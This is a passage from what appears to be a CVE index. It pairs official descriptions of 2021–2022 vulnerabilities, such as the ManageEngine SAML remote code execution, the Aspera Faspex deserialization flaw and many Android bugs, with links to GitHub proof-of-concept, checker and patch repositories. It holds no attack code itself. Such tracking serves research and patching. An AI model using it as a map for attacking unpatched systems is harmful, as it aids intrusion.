Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. This affects Access Manager Plus before 4308, Active Directory 360 before 4310, ADAudit Plus before 7081, ADManager Plus before 7162, ADSelfService Plus before 6211, Analytics Plus before 5150, Application Control Plus before 10.1.2220.18, Asset Explorer before 6983, Browser Security Plus before 11.1.2238.6, Device Control Plus before 10.1.2220.18, Endpoint Central before 10.1.2228.11, Endpoint Central MSP before 10.1.2228.11, Endpoint DLP before 10.1.2137.6, Key Manager Plus before 6401, OS Deployer before 1.1.2243.1, PAM 360 before 5713, Password Manager Pro before 12124, Patch Manager Plus before 10.1.2220.18, Remote Access Plus before 10.1.2228.11, Remote Monitoring and Management (RMM) before 10.1.41. ServiceDesk Plus before 14004, ServiceDesk Plus MSP before 13001, SupportCenter Plus before 11026, and Vulnerability Manager Plus before 10.1.2220.18. Exploitation is only possible if SAML SSO has ever been configured for a product (for some products, exploitation requires that SAML SSO is currently active).
- [horizon3ai/CVE-2022-47966](https://github.com/horizon3ai/CVE-2022-47966)
- [shameem-testing/PoC-for-ME-SAML-Vulnerability](https://github.com/shameem-testing/PoC-for-ME-SAML-Vulnerability)
- [Inplex-sys/CVE-2022-47966](https://github.com/Inplex-sys/CVE-2022-47966)
- [ACE-Responder/CVE-2022-47966_checker](https://github.com/ACE-Responder/CVE-2022-47966_checker)
- [vonahisec/CVE-2022-47966-Scan](https://github.com/vonahisec/CVE-2022-47966-Scan)
### CVE-2022-47986 (2023-02-17)
\nIBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.\n\n
- [ohnonoyesyes/CVE-2022-47986](https://github.com/ohnonoyesyes/CVE-2022-47986)
- [dhina016/CVE-2022-47986](https://github.com/dhina016/CVE-2022-47986)
- [mauricelambert/CVE-2022-47986](https://github.com/mauricelambert/CVE-2022-47986)
### CVE-2022-48150 (2023-04-21)
Shopware v5.5.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the recovery/install/ URI.
- [sahilop123/-CVE-2022-48150](https://github.com/sahilop123/-CVE-2022-48150)
### CVE-2022-48194 (2022-12-30)
TP-Link TL-WR902AC devices through V3 0.9.1 allow remote authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) by uploading a crafted firmware update because the signature check is inadequate.
- [otsmr/internet-of-vulnerable-things](https://github.com/otsmr/internet-of-vulnerable-things)
### CVE-2022-48197 (2023-01-02)
Reflected cross-site scripting (XSS) exists in Sandbox examples in the YUI2 repository. The download distributions, TreeView component and the YUI Javascript library overall are not affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
- [ryan412/CVE-2022-48197](https://github.com/ryan412/CVE-2022-48197)
### CVE-2022-48311 (2023-02-06)
**UNSUPPORTED WHEN ASSIGNED** Cross Site Scripting (XSS) in HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B allows authenticated attacker to inject their own script into the page via HTTP configuration page. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
- [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311)
### CVE-2022-48429 (2023-03-27)
In JetBrains Hub before 2022.3.15573, 2022.2.15572, 2022.1.15583 reflected XSS in dashboards was possible\n
- [echo-devim/CVE-2022-48429_poc](https://github.com/echo-devim/CVE-2022-48429_poc)
### CVE-2022-48474 (2023-09-12)
Control de Ciber, in its 1.650 version, is affected by a Denial of Service condition through the version function. Sending a malicious request could cause the server to check if an unrecognized component is up to date, causing a memory failure error that shuts down the process.
- [sapellaniz/CVE-2022-48474_CVE-2022-48475](https://github.com/sapellaniz/CVE-2022-48474_CVE-2022-48475)
### CVE-2022-48565 (2023-08-22)
An XML External Entity (XXE) issue was discovered in Python through 3.9.1. The plistlib module no longer accepts entity declarations in XML plist files to avoid XML vulnerabilities.
- [Einstein2150/CVE-2022-48565-POC](https://github.com/Einstein2150/CVE-2022-48565-POC)
## 2021
### CVE-2021-0302 (2021-02-10)
In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-155287782
- [ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302](https://github.com/ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302)
### CVE-2021-0306 (2021-01-11)
In addAllPermissions of PermissionManagerService.java, there is a possible permissions bypass when upgrading major Android versions which allows an app to gain the android.permission.ACTIVITY_RECOGNITION permission without user confirmation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-154505240.
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317)
### CVE-2021-0308 (2021-01-11)
In ReadLogicalParts of basicmbr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-158063095.
- [Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308](https://github.com/Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308)
### CVE-2021-0313 (2021-01-11)
In isWordBreakAfter of LayoutUtils.cpp, there is a possible way to slow or crash a TextView due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.0, Android-8.1; Android ID: A-170968514.
- [Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313](https://github.com/Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313)
### CVE-2021-0314 (2021-02-10)
In onCreate of UninstallerActivity, there is a possible way to uninstall an all without informed user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-171221302
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0314](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0314)
### CVE-2021-0315 (2021-01-11)
In onCreate of GrantCredentialsPermissionActivity.java, there is a possible way to convince the user to grant an app access to an account due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-169763814.
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0315](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0315)
- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315)
- [nanopathi/frameworks_base1_CVE-2021-0315](https://github.com/nanopathi/frameworks_base1_CVE-2021-0315)
### CVE-2021-0316 (2021-01-11)
In avrc_pars_vendor_cmd of avrc_pars_tg.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-168802990.
- [Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316](https://github.com/Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316)
### CVE-2021-0318 (2021-01-11)
In appendEventsToCacheLocked of SensorEventConnection.cpp, there is a possible out of bounds write due to a use-after-free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-8.1, Android-10, Android-11; Android ID: A-168211968.
- [nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318](https://github.com/nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318)
### CVE-2021-0319 (2021-01-11)
In checkCallerIsSystemOr of CompanionDeviceManagerService.java, there is a possible way to get a nearby Bluetooth device's MAC address without appropriate permissions due to a permissions bypass. This could lead to local escalation of privilege that grants access to nearby MAC addresses, with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-167244818.
- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319)
### CVE-2021-0325 (2021-02-10)
In ih264d_parse_pslice of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-174238784
- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325)
### CVE-2021-0326 (2021-02-10)
In p2p_copy_client_info of p2p.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if the target device is performing a Wi-Fi Direct search, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172937525
- [aemmitt-ns/skeleton](https://github.com/aemmitt-ns/skeleton)
- [nanopathi/wpa_supplicant_8_CVE-2021-0326.](https://github.com/nanopathi/wpa_supplicant_8_CVE-2021-0326.)
- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326)
- [nanopathi/Packages_wpa_supplicant8_CVE-2021-0326](https://github.com/nanopathi/Packages_wpa_supplicant8_CVE-2021-0326)
- [ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326](https://github.com/ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326)
### CVE-2021-0327 (2021-02-10)
In getContentProviderImpl of ActivityManagerService.java, there is a possible permission bypass due to non-restored binder identities. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-172935267
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0327](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0327)
### CVE-2021-0328 (2021-02-10)
In onBatchScanReports and deliverBatchScan of GattService.java, there is a possible way to retrieve Bluetooth scan results without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172670415
- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328)
### CVE-2021-0329 (2021-02-10)
In several native functions called by AdvertiseManager.java, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the Bluetooth server with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-171400004
- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329)
### CVE-2021-0330 (2021-02-10)
In add_user_ce and remove_user_ce of storaged.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in storaged with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-170732441
- [Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330](https://github.com/Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330)
### CVE-2021-0331 (2021-02-10)
In onCreate of NotificationAccessConfirmationActivity.java, there is a possible overlay attack due to an insecure default value. This could lead to local escalation of privilege and notification access with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-170731783
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331)
### CVE-2021-0332 (2021-02-10)
In bootFinished of SurfaceFlinger.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-169256435
- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332)
### CVE-2021-0333 (2021-02-10)
In onCreate of BluetoothPermissionActivity.java, there is a possible permissions bypass due to a tapjacking overlay that obscures the phonebook permissions dialog when a Bluetooth device is connecting. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-168504491
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333)
### CVE-2021-0334 (2021-02-10)
In onTargetSelected of ResolverActivity.java, there is a possible settings bypass allowing an app to become the default handler for arbitrary domains. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-163358811
- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334)
### CVE-2021-0336 (2021-02-10)
In onReceive of BluetoothPermissionRequest.java, there is a possible permissions bypass due to a mutable PendingIntent. This could lead to local escalation of privilege that bypasses a permission check, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-158219161
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336)
### CVE-2021-0337 (2021-02-10)
In moveInMediaStore of FileSystemProvider.java, there is a possible file exposure due to stale metadata. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-157474195
- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337)
### CVE-2021-0339 (2021-02-10)
In loadAnimation of WindowContainer.java, there is a possible way to keep displaying a malicious app while a target app is brought to the foreground. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-8.1 Android-9Android ID: A-145728687
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0339](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0339)
### CVE-2021-0340 (2021-02-10)
In parseNextBox of IsoInterface.java, there is a possible leak of unredacted location information due to improper input validation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-134155286
- [Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340)
- [nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340)
### CVE-2021-0390 (2021-03-10)
In various methods of WifiNetworkSuggestionsManager.java, there is a possible modification of suggested networks due to a missing permission check. This could lead to local escalation of privilege by a background user on the same device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174749461
- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0390](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0390)
### CVE-2021-0391 (2021-03-10)
In onCreate() of ChooseTypeAndAccountActivity.java, there is a possible way to learn the existence of an account, without permissions, due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172841550
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0391)
### CVE-2021-0392 (2021-03-10)
In main of main.cpp, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-175124730
- [uthrasri/System_Connectivity_Wificond_CVE-2021-0392](https://github.com/uthrasri/System_Connectivity_Wificond_CVE-2021-0392)
### CVE-2021-0393 (2021-03-10)
In Scanner::LiteralBuffer::NewCapacity of scanner.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if an attacker can supply a malicious PAC file, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-168041375
- [Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393](https://github.com/Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393)
### CVE-2021-0394 (2021-03-10)
In android_os_Parcel_readString8 of android_os_Parcel.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172655291
- [nanopathi/packages_apps_Settings_CVE-2021-0394](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0394)
- [Trinadh465/platform_art_CVE-2021-0394](https://github.com/Trinadh465/platform_art_CVE-2021-0394)
### CVE-2021-0396 (2021-03-10)
In Builtins::Generate_ArgumentsAdaptorTrampoline of builtins-arm.cc and related files, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-160610106
- [Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396](https://github.com/Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396)
### CVE-2021-0397 (2021-03-10)
In sdp_copy_raw_data of sdp_discovery.cc, there is a possible system compromise due to a double free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174052148
- [Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397](https://github.com/Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397)
### CVE-2021-0399 (2021-03-10)
In qtaguid_untag of xt_qtaguid.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176919394References: Upstream kernel
- [nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-](https://github.com/nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-)
### CVE-2021-0431 (2021-04-13)
In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a paired device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174149901
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431)
- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0431)
### CVE-2021-0433 (2021-04-13)
In onCreate of DeviceChooserActivity.java, there is a possible way to bypass user consent when pairing a Bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege and pairing malicious devices with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-171221090
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433)
### CVE-2021-0435 (2021-04-13)
In avrc_proc_vendor_command of avrc_api.cc, there is a possible leak of heap data due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174150451
- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0435)
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435)
### CVE-2021-0437 (2021-04-13)
In setPlayPolicy of DrmPlugin.cpp, there is a possible double free. This could lead to local escalation of privilege in a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176168330
- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437)
### CVE-2021-0466 (2021-06-11)
In startIpClient of ClientModeImpl.java, there is a possible identifier which could be used to track a device. This could lead to remote information disclosure to a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-154114734
- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0466](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0466)
### CVE-2021-0472 (2021-06-11)
In shouldLockKeyguard of LockTaskController.java, there is a possible way to exit App Pinning without a PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-176801033
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0472](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0472)
### CVE-2021-0474 (2021-06-11)
In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-177611958
- [pazhanivel07/system_bt_A10-r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10-r33_CVE-2021-0474)
- [pazhanivel07/system_bt_A10_r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10_r33_CVE-2021-0474)
### CVE-2021-0475 (2021-06-11)
In on_l2cap_data_ind of btif_sock_l2cap.cc, there is possible memory corruption due to a use after free. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-175686168
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475)
### CVE-2021-0476 (2021-06-11)
In FindOrCreatePeer of btif_av.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-169252501
- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0476](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0476)
### CVE-2021-0478 (2021-06-21)
In updateDrawable of StatusBarIconView.java, there is a possible permission bypass due to an uncaught exception. This could lead to local escalation of privilege by running foreground services without notifying the user, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-169255797
- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478)
### CVE-2021-0481 (2021-06-11)
In onActivityResult of EditUserPhotoController.java, there is a possible access of unauthorized files due to an unexpected URI handler. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-172939189
- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481)
### CVE-2021-0506 (2021-06-21)
In ActivityPicker.java, there is a possible bypass of user interaction in intent resolution due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-181962311
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506)
### CVE-2021-0507 (2021-06-21)
In handle_rc_metamsg_cmd of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181860042
- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0507](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0507)
### CVE-2021-0508 (2021-06-21)
In various functions of DrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176444154
- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508)
### CVE-2021-0509 (2021-06-21)
In various functions of CryptoPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444161
- [Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509](https://github.com/Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509)
### CVE-2021-0510 (2021-06-21)
In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444622
- [pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510](https://github.com/pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510)
### CVE-2021-0511 (2021-06-21)
In Dex2oat of dex2oat.cc, there is a possible way to inject bytecode into an app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-178055795
- [Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511](https://github.com/Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511)
### CVE-2021-0513 (2021-06-21)
In deleteNotificationChannel and related functions of NotificationManagerService.java, there is a possible permission bypass due to improper state validation. This could lead to local escalation of privilege via hidden services with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-156090809
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0513](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0513)
### CVE-2021-0516 (2021-06-21)
In p2p_process_prov_disc_req of p2p_pd.c, there is a possible out of bounds read and write due to a use after free. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181660448
- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516)
### CVE-2021-0519 (2021-08-17)
In BITSTREAM_FLUSH of ih264e_bitstream.h, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-176533109
- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519)
### CVE-2021-0520 (2021-06-21)
In several functions of MemoryFileSystem.cpp and related files, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-176237595
- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520)
- [ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520)
### CVE-2021-0522 (2021-06-21)
In ConnectionHandler::SdpCb of connection_handler.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-174182139
- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0522](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0522)
### CVE-2021-0586 (2021-07-14)
